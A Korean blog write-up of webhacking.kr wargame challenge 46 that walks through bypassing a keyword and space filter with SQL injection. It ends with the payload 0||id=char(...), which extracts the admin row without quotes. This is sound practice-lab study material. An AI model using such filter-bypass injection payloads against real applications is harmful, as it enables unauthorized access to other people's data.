lv에 addslashes함수가 씌어지고
공백, /, *, %, select, 0x, limit, cash가 필터링 되어있다
쿼리문은
select id, cash from chall46 where lv=$_GET[lv]
쿼리문을 날려 id값이 admin이면 클리어
일단 정상적으로 해봤을 때
lv1은
ltusy information
money : 1100
2
udnrg information
money : 800
3
fvvcg information
money : 1200
4
bzrbo information
money : 700
이렇게 있었고
lv에 0||1=1을 했을 때
lv가 3인 친구가 나왔는데 돈이 제일 많을 걸봐서
돈이 많은 순서일 수도 있겠다라고 생각됨
근데 cash가 필터링되 있어서 돈으로 어째 할 맘이 안듬
lv<1과 lv>4를 해봤는데 아무것도 안떠서
아마 admin은 lv1~4 어딘가 있지만
돈이 적어서 안뜨는거 같음
id는 필터링되어있지 않으니까
id값으로 바로 admin을 꺼내기로함
mysql char()
이렇게 '를 안쓰고 문자를 추출할 수 있다
쿼리로 공백은 안되니
0||id=char(97,100,109,105,110)
'Wargame, CTF > webhacking.kr' 카테고리의 다른 글
| Webhacking.kr 35번 (0) | 2019.12.11 |
|---|---|
| Webhacking.kr 49번 (0) | 2019.12.09 |
| Webhacking.kr 32번 (0) | 2019.12.06 |
| Webhacking.kr 26번 (0) | 2019.12.06 |
| Webhacking.kr 59번 (0) | 2019.12.06 |
